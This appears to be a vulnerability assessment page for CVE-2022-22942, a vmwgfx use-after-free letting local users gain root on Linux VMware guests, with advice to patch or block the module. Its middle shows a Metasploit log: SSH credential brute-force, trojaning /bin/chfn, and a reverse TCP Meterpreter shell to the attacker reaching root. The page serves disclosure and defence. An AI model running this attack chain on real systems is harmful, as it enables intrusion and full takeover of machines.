High
CVE-2022-22942
CVE-2022-22942
Description
The vmwgfx driver contains a local privilege escalation vulnerability that allows unprivileged users to gain access to files opened by other processes on the system through a dangling ‘file’ pointer.
Add Assessment
Technical Analysis
Description
This vulnerability exploits linux priv esc against VMWare virtual machines with kernel 4.14-rc1 – 5.17-rc1 due to a VMWare driver bug. Specifically, a use-after-free flaw was found in the Linux kernel’s vmw_execbuf_copy_fence_user function in drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c in vmwgfx which allows an authenticated user to escalate privileges and spawn a root shell.
Attacker Value & Exploitability
Linux kernel 4.14 was released 12 November 2017 while 5.17 was released 20 March 2022. Although this vulnerability only affects VMware virtual machines I would expect the attack surface to be rather large given the wide range of kernels affected – about 4.5 years of linux kernel releases.
Exploitability requires user level privileges however once those are obtained exploitation is trivial given the metasploit module written to exploit this vulnerability. Simply get a user session and run the exploit as seen demonstrated below:
msf6 auxiliary(scanner/ssh/ssh_login) > run rhosts=172.16.199.132 rport=4444 username=msfuser password=notpassword [*] 172.16.199.132:22 - Starting bruteforce [+] 172.16.199.132:22 - Success: 'msfuser:notpassword' 'uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux msfuser-virtual-machine 5.13.12-051312-generic #202108180838 SMP Wed Aug 18 08:41:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux ' [*] SSH session 8 opened (172.16.199.1:55151 -> 172.16.199.132:22) at 2023-01-20 09:34:18 -0500 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > run session=8 rhosts=172.16.199.132 rport=4445 [!] SESSION may not be compatible with this module: [!] * incompatible session architecture: [*] Started reverse TCP handler on 172.16.199.1:4445 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. vmwgfx installed [+] Original /bin/chfn backed up to /Users/jheysel/.msf4/loot/20230120093436_default_172.16.199.132_binchfn_034079.bin [*] Uploading payload to /tmp/.6ntizxlWd8 [*] Writing '/tmp/.6ntizxlWd8' (282 bytes) ... [*] Launching exploit... [*] Sending stage (3045348 bytes) to 172.16.199.132 [+] Deleted /tmp/.oWt34mDG4b [*] Meterpreter session 9 opened (172.16.199.1:4445 -> 172.16.199.132:36990) at 2023-01-20 09:34:45 -0500 [*] Replacing trojaned /bin/chfn with original meterpreter > getuid Server username: root meterpreter > sysinfo Computer : 172.16.199.132 OS : Ubuntu 22.04 (Linux 5.13.12-051312-generic) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter >
Defensive Suggestions
In order to protect yourself against exploitation of this vulnerability, ensure your linux VM kernel’s are up to date, and are only connected to the network where necessary.
If you’re absolutely unable to upgrade the kernel of a vulnerable machine it is possible to prevent the vulnerable kernel module from loading, RedHat demonstrates how to do that here: https://access.redhat.com/solutions/41278. However, this is a bandaid fix and promotes poor security posture, update the kernel whenever possible.
CVSS V3 Severity and Metrics
General Information
Vendors
- vmware
Products
- photon os 3.0,
- photon os 4.0
Metasploit Modules
